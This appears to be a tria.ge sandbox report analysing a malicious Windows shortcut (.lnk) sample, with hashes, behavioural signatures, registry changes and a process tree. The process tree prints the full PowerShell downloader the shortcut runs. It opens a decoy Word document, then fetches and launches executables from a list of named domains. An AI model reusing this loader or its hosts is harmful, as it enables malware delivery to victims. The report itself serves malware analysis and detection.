Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
03/05/2024, 11:07
Static task
static1
Behavioral task
behavioral1
Sample
105e49bf1a9ac6a8f095ca1e9dfa5958_JaffaCakes118.lnk
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
105e49bf1a9ac6a8f095ca1e9dfa5958_JaffaCakes118.lnk
Resource
win10v2004-20240426-en
General
-
Target
105e49bf1a9ac6a8f095ca1e9dfa5958_JaffaCakes118.lnk
-
Size
2KB
-
MD5
105e49bf1a9ac6a8f095ca1e9dfa5958
-
SHA1
ec9174ecb7de3a9ff2005dc726f4629e645d89d1
-
SHA256
18d77d07d2526660da13ca7c62925458360630a526b939f6eab32cc3233659a1
-
SHA512
194d0f1d6cb6f7069b5684f2a977134c3c8f82e29b3cd0d09f34213f1473f5a297e6593c3fb2775789038204203d1028ae47272d46ea3d929b01d9cdc498ac32
Malware Config
Signatures
-
Blocklisted process makes network request 6 IoCs
flow pid Process 5 2904 powershell.exe 6 2904 powershell.exe 7 2904 powershell.exe 9 2904 powershell.exe 11 2904 powershell.exe 12 2904 powershell.exe -
pid Process 2904 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2552 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2904 powershell.exe 2904 powershell.exe 2904 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2904 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 2552 WINWORD.EXE 2552 WINWORD.EXE 2552 WINWORD.EXE 2552 WINWORD.EXE 2552 WINWORD.EXE 2552 WINWORD.EXE 2552 WINWORD.EXE -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 1136 wrote to memory of 2904 1136 cmd.exe 29 PID 1136 wrote to memory of 2904 1136 cmd.exe 29 PID 1136 wrote to memory of 2904 1136 cmd.exe 29 PID 2904 wrote to memory of 2552 2904 powershell.exe 30 PID 2904 wrote to memory of 2552 2904 powershell.exe 30 PID 2904 wrote to memory of 2552 2904 powershell.exe 30 PID 2904 wrote to memory of 2552 2904 powershell.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\105e49bf1a9ac6a8f095ca1e9dfa5958_JaffaCakes118.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -NoProfile -command function goe { return New-Object System.Net.WebClient; }; $rnd = New-Object System.Random; $ld = 0; $cs = [char]92; $fn = $env:temp+$cs; $ll = 'actual-clinic.ru','custommaidbooks.com','pinkcamille.com','locksmithtaunton.net','helpdeskng.com'; $dc = $fn+'a.doc'; $lk = $fn+'a.txt'; $y = goe; function g($f) { Start $f; }; $c = ''; if (!(Test-Path $dc)) { for ($i=0; $i -lt 2000; $i++) { $c = $c + [char]$rnd.Next(1,255); }; $c | Out-File -FilePath $dc; }; g($dc); if (!(Test-Path $lk)) { New-Item -Path $fn -Name 'a.txt' -ItemType File; for($n=1; $n -le 2; $n++) { $gop = '/counter/?TZWajRSsfqVvY6jmjdd_QLm_5Y3oJ6kfm3XxsQkTmKkZHf6ZWl0Ozg2PggWE7WOxbIY3mPYQ9s4L3iLQaEVBvAEo4B4'+$n; $f = $fn+'a'+$n+'.exe'; for($i=$ld; $i -lt $ll.length; $i++) { $u = $ll[$i] + $gop; $u = 'http://' + $u; $y.DownloadFile($u, $f); if (Test-Path $f) { $var = Get-Item $f; if ($var.length -gt 10000) { g($f); $ld=$i; break; }; }; }; }; };notepad.exe2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a.doc"3⤵
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2552
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5259d4d0838b6e0df6374c5c81d213f54
SHA17d24482a10d90e71a275f42a92987879042c428f
SHA256e7b3fbcacb8348b511ab51c48727f0c5d448185a2cbb84e7485b67f1efff24ae
SHA512c540fbd80875d6538182152ad23afb25bb2c35eb3aacd28e28872b8f6584dbfc8372c1a0e3325a8fca79ad99972b0193197821d039a28eab721f7b2eeab2c6bc